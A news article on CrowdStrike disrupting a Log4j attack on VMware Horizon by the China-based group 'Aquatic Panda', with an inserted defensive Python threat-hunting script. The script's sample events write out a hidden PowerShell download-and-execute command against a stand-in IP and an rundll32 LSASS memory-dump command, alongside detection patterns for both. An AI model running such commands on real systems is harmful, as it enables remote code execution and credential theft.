Cybersecurity firm CrowdStrike says its threat hunters identified and disrupted an attack by a state-sponsored group based in China, which involved an exploit of the vulnerability in Apache Log4j.
CrowdStrike said today that threat hunters on its Falcon OverWatch team intervened to help protect a “large academic institution,” which wasn’t identified, from a hands-on-keyboard attack that appears to have used a modified Log4j exploit. The China-based group has been dubbed “Aquatic Panda” by CrowdStrike, and has likely been operating since mid-2020 but had previously not been identified publicly, according to the company.
“As OverWatch disrupted the attack before Aquatic Panda could take action on their objectives, their exact intent is unknown,” said Param Singh, vice president of CrowdStrike OverWatch, in an email to VentureBeat. “This adversary, however, is known to use tools to maintain persistence in environments so they can gain access to intellectual property and other industrial trade secrets.”
According to CrowdStrike, the group sought to leverage recently disclosed flaws in Apache Log4j, a popular logging software component. Since Log4j is widely used in Java applications, defense and remediation efforts have become a major focus for security teams in recent weeks, following the December 9 disclosure of the first in a series of vulnerabilities in the software: the remote code execution (RCE) flaw known as Log4Shell.
Additional vulnerabilities have been disclosed in the following weeks, with the latest coming out on Monday along with a new patch in the form of version 2.17.1 of Log4j.
Vulnerable VDI software
The exploit attempts by Aquatic Panda targeted vulnerable elements of VMware’s Horizon virtual desktop infrastructure (VDI) software, according to CrowdStrike. VMware is a major user of Java in its products, and has issued a security advisory on numerous products that have been potentially impacted by the Log4j vulnerabilities. VentureBeat has reached out to VMware for comment.
Following an advisory by VMware on December 14, CrowdStrike said that its OverWatch team began hunting for unusual processes related to VMware Horizon and the Apache Tomcat web server service.
That led the OverWatch team to observe Aquatic Panda attackers performing connectivity checks via DNS lookups and executing several Linux commands. In particular, the execution of Linux commands on a Windows host running Tomcat stood out to the threat hunters at OverWatch, CrowdStrike said in a blog post today.
At that point, OverWatch provided alerts to the Falcon platform used by the victim organization and shared details directly with the organization’s security team as well, according to CrowdStrike.
Malicious activities
Additional malicious activities by Aquatic Panda observed by OverWatch included reconnaissance to understand privilege levels and system/domain details; an attempt to block an endpoint detection and response (EDR) service; downloading of additional scripts and execution of commands using PowerShell to retrieve malware; retrieval of files that most likely constituted a reverse shell; and attempts at harvesting credentials.
In terms of credential harvesting, the OverWatch team observed Aquatic Panda repeatedly attempting to dump the memory of the Local Security Authority Subsystem Service (LSASS) process using “living-off-the-land” binaries, CrowdStrike said in its blog post.
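The hunt CrowdStrike describes (unexpected shell and recon commands spawned under Horizon's Tomcat, DNS connectivity checks, PowerShell downloads, and LSASS dumps via living-off-the-land binaries) as a stand-alone triage script over process-creation telemetry. This is an added example, not CrowdStrike's or OverWatch's tooling. The Horizon service name, the LOLBin dump patterns (rundll32 with comsvcs.dll MiniDump, Sysinternals procdump) and the sample events are assumptions constructed for illustration; the article names none of them.

```python
"""Hunt process-creation events for Log4Shell post-exploitation on a Windows
VMware Horizon host: shell/recon commands under Tomcat, PowerShell downloads,
and LSASS memory dumps via living-off-the-land binaries.
All detection patterns and sample events here are assumptions for illustration."""
import re
import shlex
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str   # full path of the parent process
    image: str          # full path of the new process
    cmdline: str        # command line of the new process


# ASSUMPTION: Horizon's Tomcat runs as ws_TomcatService.exe (or a generic Tomcat/Java exe).
TOMCAT_PARENT = re.compile(r"(ws_tomcatservice|tomcat\d*|javaw?)\.exe$", re.I)
# Unix commands have no business being spawned by Tomcat on a Windows host.
UNIX_CMDS = {"uname", "id", "sh", "bash", "cat", "ls", "curl", "wget", "chmod"}
# Windows built-ins used for privilege/domain recon and DNS connectivity checks.
RECON_CMDS = {"whoami", "nslookup", "ipconfig", "net", "systeminfo", "hostname"}
PS_DOWNLOAD = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I)
# ASSUMPTION: common LOLBin LSASS-dump command lines (not the binaries named in the article).
LSASS_DUMP = [
    re.compile(r"comsvcs(\.dll)?\s*[, ]\s*(#24|minidump)", re.I),  # rundll32 comsvcs.dll, MiniDump <pid>
    re.compile(r"procdump.*-ma\b.*\blsass", re.I),                 # procdump -ma lsass.exe
    re.compile(r"\blsass\b.*\.dmp\b", re.I),                        # any tool writing lsass*.dmp
]


def _basename(tok: str) -> str:
    """Lower-cased program name from a (possibly quoted, possibly pathed) token."""
    words = tok.strip('"').split()
    name = re.split(r"[\\/]", words[0])[-1].lower() if words else ""
    return name[:-4] if name.endswith(".exe") else name


def _first_command(cmdline: str) -> str:
    """Program actually invoked, looking through 'cmd.exe /c <program> ...'."""
    try:
        toks = shlex.split(cmdline, posix=False)   # keep Windows backslashes intact
    except ValueError:                             # unbalanced quotes: fall back to whitespace split
        toks = cmdline.split()
    if not toks:
        return ""
    head = _basename(toks[0])
    if head == "cmd" and len(toks) >= 3 and toks[1].lower() in ("/c", "/k"):
        head = _basename(toks[2])
    return head


def hunt(events):
    """Return (host, rule, program) findings in event order."""
    findings = []
    for ev in events:
        parent = re.split(r"[\\/]", ev.parent_image)[-1]
        cmd = _first_command(ev.cmdline)
        if TOMCAT_PARENT.search(parent):
            if cmd in UNIX_CMDS:
                findings.append((ev.host, "unix_cmd_under_tomcat", cmd))
            elif cmd in RECON_CMDS:
                findings.append((ev.host, "recon_under_tomcat", cmd))
            elif cmd in ("powershell", "pwsh") and PS_DOWNLOAD.search(ev.cmdline):
                findings.append((ev.host, "powershell_download_under_tomcat", cmd))
        # LSASS dumping is suspicious regardless of parent process.
        if any(p.search(ev.cmdline) for p in LSASS_DUMP):
            findings.append((ev.host, "lsass_dump_lolbin", cmd))
    return findings


# Constructed sample telemetry, not real logs.
TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
SAMPLE_EVENTS = [
    ProcEvent("vdi-01", TOMCAT, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "uname -a"'),
    ProcEvent("vdi-01", TOMCAT, r"C:\Windows\System32\cmd.exe", "cmd.exe /c nslookup abcd1234.example"),
    ProcEvent("vdi-01", TOMCAT, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://203.0.113.5/a.ps1')\""),
    ProcEvent("vdi-01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\l.dmp full"),
    ProcEvent("vdi-02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir C:\\"),
]

if __name__ == "__main__":
    for host, rule, prog in hunt(SAMPLE_EVENTS):
        print(f"{host}: {rule} ({prog})")
```

The parent-process heuristic is the point: a Java application server should never spawn a shell, so any child of the Tomcat service is worth a look, and the Unix-command case is a near-certain sign of an exploit payload written for Linux landing on a Windows host. DNS checks made through the JVM's own resolver do not appear as child processes and need DNS or network telemetry instead; the event-4 dump rule also fires on legitimate admin use of procdump, so treat it as a lead to triage rather than a verdict.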
OverWatch’s efforts to track the group and provide updates to the victim organization enabled quick implementation of the organization’s incident response protocol and containment of the threat actor, which was followed by patching of the vulnerable application, according to CrowdStrike.
The response ultimately prevented the group from achieving their objectives, Singh said.
Intelligence collection
CrowdStrike says it has been tracking Aquatic Panda since May 2020. The company previously released several reports on the group to subscribers to its Intelligence service, prior to this public disclosure about the group, CrowdStrike said.
In the blog post today, CrowdStrike described the group as a “China-based targeted intrusion adversary with a dual mission of intelligence collection and industrial espionage.”
Aquatic Panda operations have mainly focused on companies in telecommunications, technology, and government in the past, according to CrowdStrike. The group is a heavy user of the Cobalt Strike remote access tool, and has been observed using a unique Cobalt Strike downloader that has been tracked as “FishMaster,” CrowdStrike said. Aquatic Panda has also used another remote access tool, njRAT, in the past, according to the company.
Many enterprise applications and cloud services written in Java are potentially vulnerable to the flaws in Log4j if they use a version of the open source logging library earlier than 2.17.1. Log4j is believed to be used in some form, either directly or indirectly through a Java framework, by the majority of large organizations.
Earlier this month, Microsoft disclosed that it had observed activity from nation-state groups, tied to countries including China, seeking to exploit the Log4j vulnerability. Microsoft, a CrowdStrike rival, also reported observing Log4Shell-related activity by threat actors connected to Iran, North Korea, and Turkey.
Additionally, cyber firm Mandiant has reported observing Log4Shell activity by state-sponsored threat actors tied to China and Iran.